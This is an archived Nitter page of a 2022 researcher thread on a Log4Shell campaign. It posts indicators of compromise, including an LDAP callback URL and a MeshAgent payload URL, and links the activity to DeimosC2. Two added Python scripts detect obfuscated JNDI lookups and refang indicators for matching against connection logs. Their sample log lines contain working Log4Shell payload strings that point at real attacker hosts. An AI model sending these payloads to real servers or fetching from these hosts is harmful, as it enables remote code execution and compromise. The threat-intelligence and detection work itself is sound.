<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="stylesheet" type="text/css" href="/css/style.css?v=18" />
    <link rel="stylesheet" type="text/css" href="/css/fontello.css?v=2" />
    <link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" />
    <link rel="manifest" href="/site.webmanifest" />
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#ff6c60" />
    <link rel="search" type="application/opensearchdescription+xml" title="nitter" href="https://nitter.net/opensearch" />
    <link rel="canonical" href="https://twitter.com/ankit_anubhav/status/1490574137370103808" />
    <title>Ankit Anubhav (@ankit_anubhav): &quot;Looks like DemiosC2 (next-stage payload) based on code genes by @IntezerLabs and ESET. 

IP and some patterns look like the same folks from Iran 🇮🇷 who were running a campaign with MeshAgent post-exploitation

https:&#x2F;&#x2F;analyze.intezer.com&#x2F;analyses&#x2F;22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar

cc @tolisec @CharlesDardaman @BushidoToken&quot;|nitter</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="theme-color" content="#1F1F1F" />
    <meta property="og:type" content="photo" />
    <meta property="og:title" content="Ankit Anubhav (@ankit_anubhav)" />
    <meta property="og:description" content="Looks like DemiosC2 (next-stage payload) based on code genes by @IntezerLabs and ESET. 

IP and some patterns look like the same folks from Iran 🇮🇷 who were running a campaign with MeshAgent post-exploitation

https://analyze.intezer.com/analyses/22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar

cc @tolisec @CharlesDardaman @BushidoToken" />
    <meta property="og:site_name" content="Nitter" />
    <meta property="og:locale" content="en_US" />
    <link rel="preload" type="image/png" href="/pic/media%2FFK-VOjkVIAESNCj.jpg%3Fname%3Dsmall" as="image" />
    <meta property="og:image" content="https://nitter.net/pic/media%2FFK-VOjkVIAESNCj.jpg" />
    <meta property="twitter:image:src" content="https://nitter.net/pic/media%2FFK-VOjkVIAESNCj.jpg" />
    <meta property="twitter:card" content="summary_large_image" />
    <link rel="preload" type="font/woff2" as="font" href="/fonts/fontello.woff2?21002321" crossorigin="anonymous" />
  </head>
  <body>
    <div class="container"><div class="conversation">
        <div class="main-thread">
          <div class="before-tweet thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/VessOnSecurity/status/1489648199530860545#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1489648199530860545#m" title="Feb 4, 2022 · 5:13 PM UTC">Feb 4</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Caught a <a href="/search?q=%23log4shell">#log4shell</a> attack delivering something I hadn't seen before - some kind of web proxy. Still live at

ldap[:]//185.8.172.132:1389/a</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 2</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 12</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item ">
              <a class="tweet-link" href="/VessOnSecurity/status/1489650023709265934#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1489650023709265934#m" title="Feb 4, 2022 · 5:20 PM UTC">Feb 4</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Only McAfee detects, only the Java class file (not the script it downloads) and only as "Java downloader", which isn't terribly helpful.

The install script suggests some legit tool (web proxy) but is used for nefarious purposes (installing it on other people's machines).</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div>
          </div>
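<div class="added-example">
<p>The two posts above describe a Log4Shell (CVE-2021-44228) hit whose JNDI callback was <code>ldap://185.8.172.132:1389/a</code>, with the LDAP-served Java class acting as a downloader. What a responder wants from the web logs is every JNDI lookup, including the obfuscated ones that hide the word <code>jndi</code> behind nested Log4j lookups, with the callback host, port and path split out so they can be blocked and pivoted on. The script below is an added example written for this page, not code from the thread or from any of the people in it; the access-log lines in <code>SAMPLE_LOG</code> are constructed, and only the <code>ldap://&lt;ip&gt;:1389/a</code> shape and the two IPs come from the indicators posted in the thread. The lookup semantics it resolves (<code>${lower:x}</code>, <code>${upper:x}</code> and the <code>${any:-default}</code> fallback syntax) are standard Log4j 2 behaviour.</p>

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookups in web-server access logs.

Added example for this page, not code from the thread. The log lines in
SAMPLE_LOG are constructed; only the ldap://<ip>:1389/a callback shape and
the two IPs come from the indicators posted in the thread.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# De-obfuscated form we want to see: ${jndi:<scheme>://<host>[:port]<path>}
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>[^\s}]*)\}",
    re.IGNORECASE,
)


def _resolve_one(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the handful of
    lookups attackers use to hide 'jndi' from naive pattern matching."""
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):  # ${lower:X} -> x
        return body[6:].lower()
    if body.lower().startswith("upper:"):  # ${upper:X} -> X
        return body[6:].upper()
    return "${" + body + "}"               # unknown lookup (incl. jndi): keep literally


def normalize(text: str, max_rounds: int = 32) -> str:
    """Percent-decode (twice, for double-encoded payloads) and peel nested
    lookups from the inside out until the string stops changing."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(lines):
    """Return one finding per JNDI lookup, with the callback target split out
    (scheme, host, port, path) so it can be blocked or pivoted on."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalize(raw)):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "path": m.group("path"),
                "raw": raw,
            })
    return findings


# Constructed access-log lines in combined format: payload in the User-Agent,
# in the query string with nested-lookup obfuscation, and percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2022:17:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://185.8.172.132:1389/a}"
203.0.113.7 - - [04/Feb/2022:17:01:13 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://185.8.172.132:1389/a} HTTP/1.1" 400 0 "-" "curl/7.68.0"
198.51.100.9 - - [04/Feb/2022:17:02:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2022:17:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F45.12.32.14%3A1389%2Fa%7D"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {f['scheme']}://{f['host']}:{f['port']}{f['path']}")
```

<p>Matching on the literal string <code>jndi:</code> misses the second and fourth lines; normalising first is what makes a single regex sufficient. The resolver deliberately leaves <code>${jndi:...}</code> itself unevaluated, so the loop terminates once only that lookup remains.</p>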
          <div id="m" class="main-tweet"><div class="timeline-item "><div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ankit_anubhav"><img class="avatar round" src="/pic/profile_images%2F846398147303661568%2FUTNwLJ1C_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ankit_anubhav" title="Ankit Anubhav">Ankit Anubhav</a>
                        <a class="username" href="/ankit_anubhav" title="@ankit_anubhav">@ankit_anubhav</a>
                      </div>
                      <span class="tweet-date"><a href="/ankit_anubhav/status/1490574137370103808#m" title="Feb 7, 2022 · 6:32 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/VessOnSecurity">@VessOnSecurity</a></div>
                <div class="tweet-content media-body" dir="auto">Looks like DemiosC2 (next-stage payload) based on code genes by <a href="/IntezerLabs" title="Intezer">@IntezerLabs</a> and ESET. 

IP and some patterns look like the same folks from Iran 🇮🇷 who were running a campaign with MeshAgent post-exploitation

<a href="https://analyze.intezer.com/analyses/22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar">analyze.intezer.com/analyses…</a>

cc <a href="/tolisec" title="Toli">@tolisec</a> <a href="/CharlesDardaman" title="Chase Dardaman">@CharlesDardaman</a> <a href="/BushidoToken" title="Will">@BushidoToken</a></div>
                <div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/orig/media%2FFK-VOjkVIAESNCj.jpg" target="_blank"><img src="/pic/media%2FFK-VOjkVIAESNCj.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div>
                <p class="tweet-published">Feb 7, 2022 · 6:32 AM UTC · Twitter Web App</p>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 2</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div></div></div>
        </div>
        <div id="r" class="replies">
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/ankit_anubhav/status/1490576260136800259#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ankit_anubhav"><img class="avatar round" src="/pic/profile_images%2F846398147303661568%2FUTNwLJ1C_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ankit_anubhav" title="Ankit Anubhav">Ankit Anubhav</a>
                        <a class="username" href="/ankit_anubhav" title="@ankit_anubhav">@ankit_anubhav</a>
                      </div>
                      <span class="tweet-date"><a href="/ankit_anubhav/status/1490576260136800259#m" title="Feb 7, 2022 · 6:40 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/VessOnSecurity">@VessOnSecurity</a> <a href="/IntezerLabs">@IntezerLabs</a> <a href="/tolisec">@tolisec</a> <a href="/CharlesDardaman">@CharlesDardaman</a> <a href="/BushidoToken">@BushidoToken</a></div>
                <div class="tweet-content media-body" dir="auto">* DeimosC2
<a href="https://github.com/DeimosC2/DeimosC2#:~:text=DeimosC2%20is%20a%20post%2Dexploitation,front%20end%20written%20in%20Vue">github.com/DeimosC2/DeimosC2…</a>.</div>
                <div class="card large"><a class="card-container" href="https://github.com/DeimosC2/DeimosC2#:~:text=DeimosC2%20is%20a%20post%2Dexploitation,front%20end%20written%20in%20Vue">
                    <div class="card-image-container"><div class="card-image"><img src="/pic/card_img%2F1558079704086855681%2FCePtHJK1%3Fformat%3Dpng%26name%3D800x320_1" alt="" /></div></div>
                    <div class="card-content-container"><div class="card-content">
                        <h2 class="card-title">GitHub - DeimosC2&#x2F;DeimosC2: DeimosC2 is a Golang command and control framework for post-exploitat...</h2>
                        <p class="card-description">DeimosC2 is a Golang command and control framework for post-exploitation.</p>
                        <span class="card-destination">github.com</span>
                      </div></div>
                  </a></div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item thread-last ">
              <a class="tweet-link" href="/VessOnSecurity/status/1490578659622674432#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1490578659622674432#m" title="Feb 7, 2022 · 6:50 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Thanks.</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
          </div>
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/tolisec/status/1490611086177013760#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/tolisec"><img class="avatar round" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                        <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                      </div>
                      <span class="tweet-date"><a href="/tolisec/status/1490611086177013760#m" title="Feb 7, 2022 · 8:59 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/VessOnSecurity">@VessOnSecurity</a> <a href="/IntezerLabs">@IntezerLabs</a> <a href="/CharlesDardaman">@CharlesDardaman</a> <a href="/BushidoToken">@BushidoToken</a></div>
                <div class="tweet-content media-body" dir="auto">Seems related to an attack I captured earlier; it uses the ‘/a’ class name and MeshAgent:</div>
                <div class="quote quote-big">
                  <a class="quote-link" href="/tolisec/status/1486385955099582472#m"></a>
                  <div class="tweet-name-row">
                    <div class="fullname-and-username">
                      <img class="avatar round mini" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__mini.jpg" />
                      <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                      <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                    </div>
                    <span class="tweet-date"><a href="/tolisec/status/1486385955099582472#m" title="Jan 26, 2022 · 5:10 PM UTC">Jan 26</a></span>
                  </div>
                  <div class="quote-text" dir="auto"><a href="/search?q=%23log4j">#log4j</a> <a href="/search?q=%23malware">#malware</a> MeshAgent
IoCs: 
ldap://45[.]12[.]32.14:1389/a
hxxp://45.12[.]32[.]14:8080/meshagent.exe
connects to 45.12.32.61
bazaar: <a href="https://bazaar.abuse.ch/sample/8350a3a65abbc7a2ecb5c8d997341289370d26d1f6ad65e9bd99f04c806baa89/">bazaar.abuse.ch/sample/8350a…</a>  
Sandbox Analysis: <a href="http://any.run">any.run</a> <a href="https://app.any.run/tasks/6c6d25db-40fa-4080-a5e2-a05f44eba16c/">app.any.run/tasks/6c6d25db-4…</a></div>
                  <div class="quote-media-container"><div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/orig/media%2FFKCz5lEXwAEiUpn.jpg" target="_blank"><img src="/pic/media%2FFKCz5lEXwAEiUpn.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div></div>
                </div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item thread-last ">
              <a class="tweet-link" href="/VessOnSecurity/status/1490634174256013317#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1490634174256013317#m" title="Feb 7, 2022 · 10:30 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Maybe but not the same. The Java exploit downloads and runs a bash script, which does contain several references to "mesh" but seems legit (error messages, uninstall command, progress messages).</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
          </div>
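<div class="added-example">
<p>The indicators in this thread are defanged in three different styles (<code>ldap[:]//</code>, <code>45[.]12[.]32.14</code>, <code>hxxp://</code>) and one of them is a bare IP with no port. Before they can be matched against anything they need to be refanged and parsed into a common shape, and the match itself should distinguish a destination that hits host and port from one that only hits the host, since the port in an IoC is just what the attacker used on one day. The script below is an added example written for this page, not tooling from the thread or from any of the people in it. <code>POSTED_IOCS</code> are the indicator strings exactly as they appear in the posts by @VessOnSecurity and @tolisec above; <code>CONN_LOG</code> is constructed (space-separated timestamp, source, source port, destination, destination port, protocol) and the internal and unrelated addresses in it are made up.</p>

```python
"""Refang the indicators posted in this thread and match them against outbound
connection records.

Added example for this page, not the thread's own tooling. POSTED_IOCS are the
strings exactly as posted; CONN_LOG is constructed (space-separated:
timestamp src src_port dst dst_port proto).
"""
import re
from typing import NamedTuple, Optional
from urllib.parse import urlsplit

POSTED_IOCS = [
    "ldap[:]//185.8.172.132:1389/a",              # @VessOnSecurity, Feb 4
    "ldap://45[.]12[.]32.14:1389/a",              # @tolisec, Jan 26
    "hxxp://45.12[.]32[.]14:8080/meshagent.exe",  # @tolisec, Jan 26
    "45.12.32.61",                                # @tolisec, Jan 26 ("connects to")
]

_BRACKETS = (("[.]", "."), ("(.)", "."), ("{.}", "."),
             ("[://]", "://"), ("[:]", ":"), ("[/]", "/"))


def refang(ioc: str) -> str:
    """Undo the common defanging styles, which the thread mixes inconsistently."""
    out = ioc.strip()
    for defanged, real in _BRACKETS:
        out = out.replace(defanged, real)
    out = re.sub(r"^hxxp", "http", out, flags=re.IGNORECASE)
    out = re.sub(r"^fxp", "ftp", out, flags=re.IGNORECASE)
    return out


class Indicator(NamedTuple):
    scheme: Optional[str]   # None for a bare host/IP
    host: str
    port: Optional[int]     # None when the indicator does not pin a port
    path: str


def parse_ioc(raw: str) -> Indicator:
    """Refang, then split a URL-shaped or bare host[:port] indicator into parts."""
    s = refang(raw)
    if "://" in s:
        u = urlsplit(s)
        return Indicator(u.scheme.lower(), u.hostname or "", u.port, u.path)
    host, _, port = s.partition(":")
    return Indicator(None, host, int(port) if port else None, "")


def match_connections(conn_lines, indicators):
    """Flag connections whose destination is an indicator host. Host+port is
    'exact'; the same host on another port is 'host-only', still worth a look."""
    by_host = {}
    for ind in indicators:
        by_host.setdefault(ind.host, []).append(ind)
    matches = []
    for line in conn_lines:
        if not line.strip():
            continue
        ts, src, _sport, dst, dport, _proto = line.split()
        dport = int(dport)
        candidates = by_host.get(dst)
        if not candidates:
            continue
        tier = "exact" if any(c.port in (None, dport) for c in candidates) else "host-only"
        matches.append({"ts": ts, "src": src, "dst": dst, "dport": dport, "tier": tier})
    return matches


# Constructed connection records; 10.0.0.x and 198.51.100.20 are made up.
CONN_LOG = """\
2022-02-04T17:01:14Z 10.0.0.5 49211 185.8.172.132 1389 tcp
2022-02-04T17:01:15Z 10.0.0.5 49212 185.8.172.132 8080 tcp
2022-02-04T17:01:20Z 10.0.0.5 49213 45.12.32.61 443 tcp
2022-02-04T17:02:00Z 10.0.0.6 49300 198.51.100.20 443 tcp
2022-02-04T17:02:30Z 10.0.0.5 49214 45.12.32.14 8080 tcp
"""

if __name__ == "__main__":
    inds = [parse_ioc(i) for i in POSTED_IOCS]
    for m in match_connections(CONN_LOG.splitlines(), inds):
        print(m)
```

<p>The second record (the LDAP callback host contacted on 8080) is exactly the case the tiering exists for: the same host serving the LDAP referral on 1389 and a payload on 8080 is what @tolisec's indicators show for 45.12.32.14, so a host-only hit should be triaged rather than dropped.</p>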
        </div>
      </div></div>
  </body>
</html>